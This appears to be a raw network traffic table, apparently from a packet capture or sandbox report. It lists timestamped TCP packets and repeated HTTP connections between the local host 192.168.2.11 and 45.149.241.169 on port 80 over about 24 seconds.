Oct 3, 2024 09:21:01.623254061 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:01.623466969 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:01.628575087 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.292433023 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.292635918 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.292690039 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.292751074 CEST | 64352 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.297468901 CEST | 80 | 64352 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.435652971 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.440912962 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.441021919 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.443226099 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.448632002 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:02.448704004 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:02.453495026 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.191437006 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.191821098 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.191951990 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.196533918 CEST | 64354 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.202516079 CEST | 80 | 64354 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.475652933 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.480690956 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.480761051 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.482903957 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.487999916 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:03.488048077 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:03.493161917 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.262743950 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.262772083 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.262865067 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.262957096 CEST | 64355 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.268373013 CEST | 80 | 64355 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.416018009 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.421169996 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.421297073 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.423429966 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.428256035 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:04.428361893 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:04.433180094 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.200607061 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.200762987 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.201138020 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.201246977 CEST | 64357 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.205631971 CEST | 80 | 64357 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.342603922 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.348911047 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.351687908 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.354207039 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.360822916 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:05.363792896 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:05.370971918 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.209109068 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.209342003 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.209383011 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.209439039 CEST | 64358 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.216903925 CEST | 80 | 64358 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.372730017 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.378586054 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.378793001 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.380893946 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.386023998 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:06.386274099 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:06.391282082 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.095535040 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.095755100 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.096066952 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.096124887 CEST | 64359 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.101686954 CEST | 80 | 64359 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.250000000 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.255400896 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.255842924 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.258128881 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.265115976 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:07.265208006 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:07.273240089 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.057806969 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.057863951 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.058000088 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.058067083 CEST | 64360 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.062889099 CEST | 80 | 64360 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.212765932 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.217818975 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.217895031 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.219978094 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.224898100 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.224948883 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.230029106 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.908827066 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.908874989 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:08.908970118 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.914026976 CEST | 64361 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:08.918941021 CEST | 80 | 64361 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.160537004 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.165386915 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.165496111 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.167659998 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.172564983 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.172629118 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.177422047 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.839379072 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.839438915 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.839582920 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.839634895 CEST | 64362 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.844424009 CEST | 80 | 64362 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.983649015 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.989329100 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.989458084 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.991626978 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:09.997446060 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:09.997520924 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.002466917 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.836468935 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.836563110 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.836642027 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.837057114 CEST | 64363 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.841978073 CEST | 80 | 64363 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.984106064 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.989195108 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.989339113 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.991457939 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:10.996373892 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:10.996788025 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:11.001732111 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:11.917808056 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:11.917861938 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:11.917887926 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:11.918001890 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:11.918284893 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:11.918330908 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:11.921417952 CEST | 64364 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:11.926165104 CEST | 80 | 64364 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.100244045 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.105030060 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.105155945 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.107372999 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.112209082 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.112320900 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.117145061 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.880244970 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.880259991 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:12.880481005 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.880548000 CEST | 64365 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:12.885827065 CEST | 80 | 64365 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.035780907 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.044430971 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.044519901 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.046875954 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.055427074 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.055507898 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.064030886 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.766148090 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.766297102 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.766336918 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.766391993 CEST | 64366 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.771289110 CEST | 80 | 64366 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.903770924 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.908863068 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.908951998 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.911133051 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.916779041 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:13.916853905 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:13.921673059 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.575090885 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.575146914 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.575323105 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.601238966 CEST | 64367 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.606298923 CEST | 80 | 64367 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.869189978 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.874142885 CEST | 80 | 64368 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.874232054 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.876427889 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.881191015 CEST | 80 | 64368 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:14.881237984 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:14.886039019 CEST | 80 | 64368 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:15.898722887 CEST | 80 | 64368 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:15.899147034 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:15.904499054 CEST | 80 | 64368 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:15.904602051 CEST | 64368 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.047513962 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.052357912 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:16.052450895 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.055149078 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.059921980 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:16.059968948 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.064852953 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:16.915457964 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:16.915505886 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:16.915648937 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.917283058 CEST | 64369 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:16.922230005 CEST | 80 | 64369 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.069195032 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.074018002 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.074124098 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.076250076 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.081103086 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.083632946 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.088541985 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.866369963 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.866391897 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:17.866523981 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.866600037 CEST | 64370 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:17.872168064 CEST | 80 | 64370 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:18.010854006 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:18.016283035 CEST | 80 | 64371 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:18.016372919 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:18.018455029 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:18.023422956 CEST | 80 | 64371 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:18.023488045 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:18.028234959 CEST | 80 | 64371 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:19.008034945 CEST | 80 | 64371 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:19.008214951 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.014470100 CEST | 80 | 64371 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:19.014532089 CEST | 64371 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.160871983 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.165775061 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:19.167788029 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.169938087 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.174781084 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:19.175709009 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:19.180566072 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.428244114 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.428539038 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.428792953 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.428858995 CEST | 64372 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.433379889 CEST | 80 | 64372 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.578989029 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.585637093 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.585773945 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.587904930 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.592727900 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:21.592823982 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:21.597687960 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.234579086 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.234736919 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.234810114 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.235256910 CEST | 64373 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.239707947 CEST | 80 | 64373 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.374394894 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.379287004 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.379380941 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.381572008 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.386459112 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:22.386914968 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:22.391767979 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.090107918 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.090142965 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.090241909 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.090287924 CEST | 64374 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.095072031 CEST | 80 | 64374 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.234726906 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.239660978 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.239794970 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.241945982 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.246740103 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.246841908 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.251600027 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.948323011 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.948483944 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.948685884 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:23.948740005 CEST | 64375 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:23.953248024 CEST | 80 | 64375 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.092489004 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.097281933 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.097440004 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.099610090 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.104384899 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.104473114 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.109239101 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.875488997 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.875575066 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:24.875611067 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.875654936 CEST | 64376 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:24.880425930 CEST | 80 | 64376 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.016508102 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.021584988 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.021671057 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.024096966 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
